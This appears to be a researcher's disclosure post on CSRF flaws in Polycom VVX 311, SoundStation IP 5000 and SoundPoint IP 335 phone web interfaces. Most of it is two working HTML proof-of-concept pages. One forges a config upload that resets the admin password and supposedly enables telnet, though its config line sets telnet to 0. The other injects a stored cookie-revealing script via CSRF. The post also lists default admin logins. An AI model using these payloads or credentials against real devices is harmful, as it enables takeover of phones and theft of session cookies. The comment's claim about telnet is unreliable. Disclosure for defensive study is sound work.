Phone Model | VVX 311 |
Part Number | 3111-48350-001 Rev:A |
MAC Address | X |
IP Mode | IPv4 |
IP Address | X |
UC Software Version | 5.9.1.0615 |
Updater Version | 5.9.7.12459 |
This gui seems to be similar or the same to the soundpoint, Most Post requests seem vulnerable to csrf. I can just take out the cookie login/pass that is in each request and craft a csrf. For example the following is a csrf example that changes the admin password and turns on telnet. This works for the VVX model however the same csrf did not work for the soundstation and soundpoint.
<html>
<!-- Polycom VVX 5.9.1.0615 CSRF - Changes Admin pass to 123456. Also turns telnet on, login Polycom/123456 -->
<body>
<script>history.pushState('', '', '/')</script>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https:\/\/192.168.128.11\/form-submit\/Utilities\/configuration\/importFile", true);
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------402251386101268401375671906");
xhr.withCredentials = true;
var body = "-----------------------------402251386101268401375671906\r\n" +
"Content-Disposition: form-data; name=\"myfile\"; filename=\"polycomtelnet.cfg\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3cdevice device.set=\"1\"\x3e\n" +
"\x3cauth device.auth.localAdminPassword.set=\"1\" device.auth.localAdminPassword=\"123456\"/\x3e\n" +
"\x3ctelnet diags.telnetd.enabled=\"0\"\x3e\x3c/telnet\x3e\n" +
"\r\n" +
"-----------------------------402251386101268401375671906--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
This sends a file called polycomtelnet.cfg which basically looks like this.
<device device.set="1">
<auth device.auth.
<telnet diags.telnetd.enabled="0"></
Phone Model | SoundStation IP 5000 & SoundPoint IP 335 (same firmware) |
Part Number | 3111-30900-001 Rev:H |
MAC Address | X |
IP Address | X |
UC Software Version | 4.0.14.1388 |
BootROM Software Version | 5.0.14.0580 |
This is a Post Xss via csrf that both the newest firmware of soundstation and soundpoint are vulnerable to. Given the simple Cookie: Authorization= having cookies exposed can make this easy to convert from base64.
<html>
<!-- Post XSS via CSRF on Soundstation IP 5000 & SoundPoint IP 335 UC ver 4.0.14.1388 -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.128.17/form-submit" method="POST">
<input type="hidden" name="250:1" value=""><Script>alert(document.cookie)</Script>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Most of these devices come with default logins: user/123 admin/456 . However if the company setting these up has changed them these csrf vulnerabilities could be useful.